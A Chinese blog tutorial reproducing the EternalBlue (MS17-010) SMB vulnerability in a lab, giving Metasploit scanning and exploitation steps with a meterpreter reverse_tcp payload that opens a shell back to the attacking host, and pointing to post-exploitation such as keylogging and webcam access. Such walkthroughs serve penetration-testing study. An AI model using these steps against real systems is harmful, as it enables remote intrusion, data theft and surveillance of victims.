永恒之蓝 MS17-010漏洞复现

永恒之蓝 MS17-010漏洞复现

文章目录

  • 永恒之蓝 MS17-010漏洞复现
    • 一:漏洞原理
      • 1:简介
      • 2:漏洞原理代码详解
    • 二:漏洞复现
      • 1:信息收集
      • 2:尝试攻击
        • 1>:查看漏洞模块——search ms17-010
        • 2>:可以先使用辅助扫描模块测试 use auxiliary/scanner/smb/smb_ms17_010
        • 3>:使用攻击模块进行攻击 use exploit/windows/smb/ms17_010_eternalblue

版权声明:本文为博主原创文章,欢迎转载,请注明出处: https://blog.csdn.net/qq_41880069/article/details/82908131

一:漏洞原理

1:简介

  • 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码
  • 注:SMB服务的作用:该服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无,SMB服务详解:点击查看

2:漏洞原理代码详解

下面两篇文章从实际代码详细分析了漏洞原理,想要从代码详细理解该漏洞的同学可以点击查看

  • http://blogs.360.cn/post/nsa-eternalblue-smb.html#toc-772
  • https://blog.csdn.net/qq_27446553/article/details/73480807

二:漏洞复现

1:信息收集

信息收集的两种方法:

  • 使用msf的扫描模块,通过search scanner可以查看大量的扫描模块,这里通过search portscan命令查看端口扫描器列表,输入use 模块名,即可使用该模块
    例:这里使用syn扫描模块为例
    永恒之蓝 MS17-010漏洞复现_第1张图片
    永恒之蓝 MS17-010漏洞复现_第2张图片
    永恒之蓝 MS17-010漏洞复现_第3张图片
    可以看到这里扫描的结果显示目标记器0-500的端口内开了135,139,445端口。而永恒之蓝利用的就是445端口 smb服务 操作系统溢出漏洞
  • 使用nmap扫描
    在msf也可以使用nmap进行扫描进行信息收集,示例如下:
    ①:扫描版本服务
    永恒之蓝 MS17-010漏洞复现_第4张图片
    若扫描出来有可能存在的漏洞的服务,可以search 该服务,查看可以利用的攻击模块

这里从收集信息来看目标主机445端口开放,可以尝试使用ms17-010(永恒之蓝)来攻击

2:尝试攻击

1>:查看漏洞模块——search ms17-010

永恒之蓝 MS17-010漏洞复现_第5张图片
可以看到有auxiliary(辅助)模块和exploit(攻击)模块

2>:可以先使用辅助扫描模块测试 use auxiliary/scanner/smb/smb_ms17_010

扫描结果显示该主机很容易受到ms17-010的攻击
在这里插入图片描述

3>:使用攻击模块进行攻击 use exploit/windows/smb/ms17_010_eternalblue

选择攻击模块时注意选择合适的版本,有些版本使用于win8以上

  • set payload :设置payload,这里用set payload windows/x64/meterpreter/reverse_tcp
    要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload
  • show options :使用该命令会列出使用当前模块所需呀配置的参数
  • set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
  • set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
  • set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
  • run:开始攻击
    攻击成功后攻击机和目标主机之间会建立一个连接,得到一个meterpreter会话
    永恒之蓝 MS17-010漏洞复现_第6张图片
    上面已经对攻击的信息做了标注,这里进行解释:
  • ①:表示永恒之蓝覆盖成功完成
  • ②:目标主机和攻击机建立了了一个shell连接,会话为session 1
  • ③:得到一个meterpreter会话,尝试获取shell失败
  • ④:在meterpreter会话下输入ps就能获得目标主机的当前进程
    注: meterpreter是metasploit框架中的一个扩展模块,是后渗透攻击中的杀手锏,使用meterpreter作为攻击载荷,建立连接后可以对目标系统进行更深入的渗透,在本次连接建立后,我单独写了一篇后渗透攻击的博客,大家可以跳转续看:https://blog.csdn.net/qq_41880069/article/details/82908293
    点击这里直接在当前网页跳转至该博客

到这里漏洞攻击已经成功,接下来要做的就是后渗透攻击,涉及到权限提升,跳板攻击,密码哈希值获取,获取shell以及其他更多信息

后渗透测试中会有很多好玩的指令操作,如打开摄像头,记录键盘输入,进入目标主机目录等等,欢迎大家访问 点击这里查看:后渗透测试攻击详解,欢迎大家关注博主,相互交流,共同进步,谢谢。


版权声明:本文为博主原创文章,转载请注明出处:https://blog.csdn.net/qq_41880069/article/details/82908131

你可能感兴趣的:(漏洞复现)